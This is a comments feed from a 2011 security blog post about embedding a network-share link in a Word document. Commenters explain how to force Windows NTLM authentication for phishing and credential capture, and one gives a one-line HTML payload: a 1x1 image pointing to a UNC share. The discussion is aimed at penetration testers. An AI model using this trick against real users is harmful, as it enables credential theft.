<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/'><id>tag:blogger.com,1999:blog-8539880144347728238.post1005890945395905764..comments</id><updated>2011-12-01T13:19:32.220-05:00</updated><category term='puttyhijack'/><category term='Research'/><category term='http options'/><category term='news'/><category term='MAC addresses'/><category term='shotgun posts'/><category term='Val Smith'/><category term='Paterva'/><category term='malware'/><category term='ike-scan'/><category term='tsa'/><category term='privacy'/><category term='webcasts'/><category term='linkedin'/><category term='eeepc'/><category term='Dr-crack'/><category term='shmoocon 08'/><category term='swfscan'/><category term='citrix hacking'/><category term='The Craft of System Security'/><category term='Book Reviews'/><category term='scams'/><category term='wrap-up'/><category term='pwnage'/><category term='EthicalHacker.net'/><category term='DNS exploit'/><category term='sticky ports'/><category term='Traceroute'/><category term='WTF'/><category term='Security Data Visualization'/><category term='silc'/><category term='hack tools'/><category term='rant'/><category term='scripting'/><category term='IPv6'/><category term='infosecwriters.com'/><category term='privacy is dead'/><category term='java'/><category term='Hacking Exposed Windows'/><category term='webdav'/><category term='Metasploit'/><category term='attack analysis'/><category term='wordpress'/><category term='Joe Klein'/><category term='http-dir-enum'/><category term='blackhat DC'/><category term='deauth attack'/><category term='opinion'/><category term='jeremiah grossman'/><category term='Botnets'/><category term='airodump-ng'/><category term='defense'/><category term='ubuntu'/><category term='stupid users'/><category term='windows vista'/><category term='ruby'/><category term='Metasploit Pro'/><category term='education'/><category term='SOURCE Boston 2009'/><category term='carnal0wnage'/><category term='ida pro'/><category term='NTP'/><category term='local root'/><category term='backtrack2'/><category term='Endpoint Security'/><category term='pidgin'/><category term='SQL  Injection'/><category term='conti'/><category term='hacking'/><category term='forenics'/><category term='domo kun video'/><category term='HackerDefender'/><category term='sqlite3'/><category term='sqlmap'/><category term='lft'/><category term='SOURCE Boston 2008'/><category term='usernames'/><category term='chicagocon'/><category term='webshells'/><category term='reDuh'/><category term='karmetasploit'/><category term='google dorks'/><category term='file format'/><category term='irc'/><category term='podcasts'/><category term='backtrack3'/><category term='chris nickerson'/><category term='token kidnaping'/><category term='wmap'/><category term='EFF NSA Shirt'/><category term='shmoocon 09'/><category term='install your own linux distro'/><category term='smbshell'/><category term='The Art of Software Security Testing'/><category term='Dan Hoffman'/><category term='Full Scope Security'/><category term='layer2'/><category term='portqry'/><category term='rainbow tables'/><category term='w3af'/><category term='databases'/><category term='Scapy'/><category term='IE7 Exploit'/><category term='pentoo'/><category term='phishing'/><category term='Traceroute Aggregation'/><category term='metagoofil'/><category term='sensitive data leakage'/><category term='twitter'/><category term='Crash Course in Penetration Testing'/><category term='process injection'/><category term='P2P'/><category term='timestomp'/><category term='foursquare'/><category term='GoogleAds'/><category term='DNS'/><category term='incognito'/><category term='Security Conferences'/><category term='risk management'/><category term='passthehash toolkit'/><category term='zone transfers'/><category term='token impersonation'/><category term='sensepost'/><category term='Network Mapping'/><category term='Chris Gates'/><category term='Learn Security Online'/><category term='Pentesting'/><category term='day in the life'/><category term='mssql_ping'/><category term='toorcon'/><category term='cktricky'/><category term='digging into the chewy center'/><category term='scp'/><category term='SCADA'/><category term='kismet'/><category term='yersinia'/><category term='AttackResearch'/><category term='notes'/><category term='volatility'/><category term='xml'/><category term='Packet Analysis'/><category term='Joe McCray'/><category term='tempest'/><category term='Full Scope Testing'/><category term='rootkit'/><category term='Maltego'/><category term='offtopic'/><category term='msvctl'/><category term='oracle'/><category term='password cracking'/><category term='android'/><category term='non-english'/><category term='null sa'/><category term='Physical Security'/><category term='exploits'/><category term='tnscmd'/><category term='scanning'/><category term='digital signatures'/><category term='Incident Response'/><category term='ssl'/><category term='interviews'/><category term='information Gathering'/><category term='snmp'/><category term='VNC'/><category term='mwr InfoSecurity'/><category term='Traceroute Visulization'/><category term='automation'/><category term='defcon'/><category term='XSS'/><category term='meterpreter'/><category term='Fresh New Look'/><category term='Johnny Long'/><category term='defeating AV'/><category term='Security Metrics'/><category term='Wireless'/><category term='Information Security Day'/><category term='rpcclient'/><category term='aircrack-ng'/><category term='No Tech Hacking'/><category term='javascript'/><category term='coldfusion'/><category term='karmasploit'/><category term='mssql_login'/><category term='karma'/><category term='metacab'/><category term='youtube'/><category term='Security'/><category term='press'/><category term='mssql'/><category term='Programming'/><category term='richard bejtlich'/><category term='sunday comics'/><category term='lotus domino'/><category term='No Place To Hide'/><category term='espionage'/><category term='local to domain account'/><category term='LG voyager'/><category term='sqid'/><category term='hakin9'/><category term='HE Windows'/><category term='Programming Book Review Criteria'/><category term='Geek Mafia'/><category term='dhcp script injection'/><category term='motorola xoom root'/><category term='rfid'/><category term='volreg'/><category term='linux'/><category term='Mail'/><category term='java decompile'/><category term='null-session'/><category term='cadaver'/><category term='8570.1'/><category term='social engineering'/><category term='thin client hacking'/><category term='mike murray'/><category term='politics'/><category term='conspiracy'/><category term='nmap'/><category term='web application testing'/><category term='ncrack'/><category term='firewire'/><category term='unicornscan'/><category term='client side attacks'/><category term='enumeration'/><category term='john the ripper'/><category term='nessus'/><category term='upload.asp'/><category term='life'/><category term='certification'/><category term='antivirus'/><category term='exploit dev course'/><category term='HR Geeks'/><category term='exotic liability'/><category term='NoVA Sec'/><category term='slicehost'/><category term='jboss'/><category term='pass the hash'/><category term='printer hacking'/><category term='quotes'/><category term='DNS Fingerprinting'/><category term='Fuzzing: Brute Force Vulnerability Discovery'/><category term='fail'/><category term='auxiliary modules'/><category term='paranoia'/><category term='webgoat'/><category term='identity theft'/><category term='gsecdump'/><title type='text'>Comments on Carnal0wnage &amp;amp; Attack Research Blog: Embeding A Link To A Network Share In A Word Doc</title><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://carnal0wnage.attackresearch.com/feeds/1005890945395905764/comments/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8539880144347728238/1005890945395905764/comments/default'/><link rel='alternate' type='text/html' href='http://carnal0wnage.attackresearch.com/2011/11/embeding-link-to-network-share-in-word.html'/><author><name>CG</name><uri>http://www.blogger.com/profile/11061967917509053185</uri><email>noreply@blogger.com</email><gd:image xmlns:gd='http://schemas.google.com/g/2005' rel='http://schemas.google.com/g/2005#thumbnail' width='31' height='21' src='http://2.bp.blogspot.com/_bgJlT6eWjGg/SUWqYCLeW0I/AAAAAAAAAY8/tQezLhC2few/S220/toorcongates.JPG'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>2</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-8539880144347728238.post-5870163528233058781</id><published>2011-12-01T12:57:44.677-05:00</published><updated>2011-12-01T12:57:44.677-05:00</updated><title type='text'>By referring to it as an IP address it won&amp;#39;t a...</title><content type='html'>By referring to it as an IP address it won&amp;#39;t auto authenticate. Otherwise, you could embed an Internet IP and it&amp;#39;d auth off of the local network.&lt;br /&gt;&lt;br /&gt;Assuming rules aren&amp;#39;t different for Outlook (I don&amp;#39;t know why they would be, but its possible), you&amp;#39;d want to refer to your server by a netbios name or by a name within the domain.&lt;br /&gt;&lt;br /&gt;[html][body][img src=&amp;quot;\\pwned\share\pwn.jpeg&amp;quot;&lt;br /&gt; width=1 height=1][/body][html]</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8539880144347728238/1005890945395905764/comments/default/5870163528233058781'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8539880144347728238/1005890945395905764/comments/default/5870163528233058781'/><link rel='alternate' type='text/html' href='http://carnal0wnage.attackresearch.com/2011/11/embeding-link-to-network-share-in-word.html?showComment=1322762264677#c5870163528233058781' title=''/><author><name>natron</name><uri>http://www.blogger.com/profile/08165445198675206275</uri><email>noreply@blogger.com</email><gd:image xmlns:gd='http://schemas.google.com/g/2005' rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:in-reply-to xmlns:thr='http://purl.org/syndication/thread/1.0' href='http://carnal0wnage.attackresearch.com/2011/11/embeding-link-to-network-share-in-word.html' ref='tag:blogger.com,1999:blog-8539880144347728238.post-1005890945395905764' source='http://www.blogger.com/feeds/8539880144347728238/posts/default/1005890945395905764' type='text/html'/><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='blogger.itemClass' value='pid-1880247261'/></entry><entry><id>tag:blogger.com,1999:blog-8539880144347728238.post-2076940594299321839</id><published>2011-11-30T08:28:19.824-05:00</published><updated>2011-11-30T08:28:19.824-05:00</updated><title type='text'>I do believe negotiate NTLM if possible is the def...</title><content type='html'>I do believe negotiate NTLM if possible is the default setting for Windows 7.&lt;br /&gt;&lt;br /&gt;Interesting post.  Its another great way to gather phishing metrics or possible creds.</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8539880144347728238/1005890945395905764/comments/default/2076940594299321839'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8539880144347728238/1005890945395905764/comments/default/2076940594299321839'/><link rel='alternate' type='text/html' href='http://carnal0wnage.attackresearch.com/2011/11/embeding-link-to-network-share-in-word.html?showComment=1322659699824#c2076940594299321839' title=''/><author><name>cc</name><uri>http://www.obscuresec.com</uri><email>noreply@blogger.com</email><gd:image xmlns:gd='http://schemas.google.com/g/2005' rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img1.blogblog.com/img/blank.gif'/></author><thr:in-reply-to xmlns:thr='http://purl.org/syndication/thread/1.0' href='http://carnal0wnage.attackresearch.com/2011/11/embeding-link-to-network-share-in-word.html' ref='tag:blogger.com,1999:blog-8539880144347728238.post-1005890945395905764' source='http://www.blogger.com/feeds/8539880144347728238/posts/default/1005890945395905764' type='text/html'/><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='blogger.itemClass' value='pid-1071733947'/></entry></feed>
